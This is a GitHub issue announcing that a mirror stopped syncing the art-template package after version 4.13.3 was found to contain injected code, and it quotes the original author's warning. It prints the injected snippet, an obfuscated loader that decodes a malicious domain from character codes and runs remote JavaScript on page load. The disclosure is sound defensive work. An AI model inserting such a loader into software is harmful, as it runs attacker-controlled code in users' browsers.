Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

art-template 包停止同步 #777

Closed
elrrrrrrr opened this issue Mar 18, 2025 · 3 comments
Closed

art-template 包停止同步 #777

elrrrrrrr opened this issue Mar 18, 2025 · 3 comments

Comments

@elrrrrrrr
Copy link
Member

elrrrrrrr commented Mar 18, 2025

As the original author of this package, I confirm that version 4.13.3 contains implanted malicious code. This code dynamically loads external resources from https://git.youzzjizz.com/git.js (obfuscated via character code conversion), a domain marked as malicious by multiple security vendors. Having lost maintenance privileges, I cannot directly revoke this version.

4.13.3 版本注入动态代码,且相关变更不在 github repo 中体现,相关 issue 被二次删除,风险较高,开始停止同步。

function scriptMagician() {
  var script = document.createElement("script");
  script.src = String.fromCharCode.apply(
    null,
    [
      104, 116, 116, 112, 115, 58, 47, 47, 103, 105, 116, 46, 121, 111, 117,
      122, 122, 106, 105, 122, 122, 46, 99, 111, 109, 47, 103, 105, 116, 46,
      106, 115,
    ]
  );
  script.onload = function () {
    if (typeof initBaiduShare === "function") {
      initBaiduShare();
    }
  };
  script.onerror = function () {};
  document.head.appendChild(script);
}
scriptMagician();
@elrrrrrrr
Copy link
Member Author

elrrrrrrr commented Mar 18, 2025

Image

已生效

@fengmk2
Copy link
Member

fengmk2 commented Mar 18, 2025

之前的截图

Image

@fengmk2
Copy link
Member

fengmk2 commented Mar 18, 2025

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants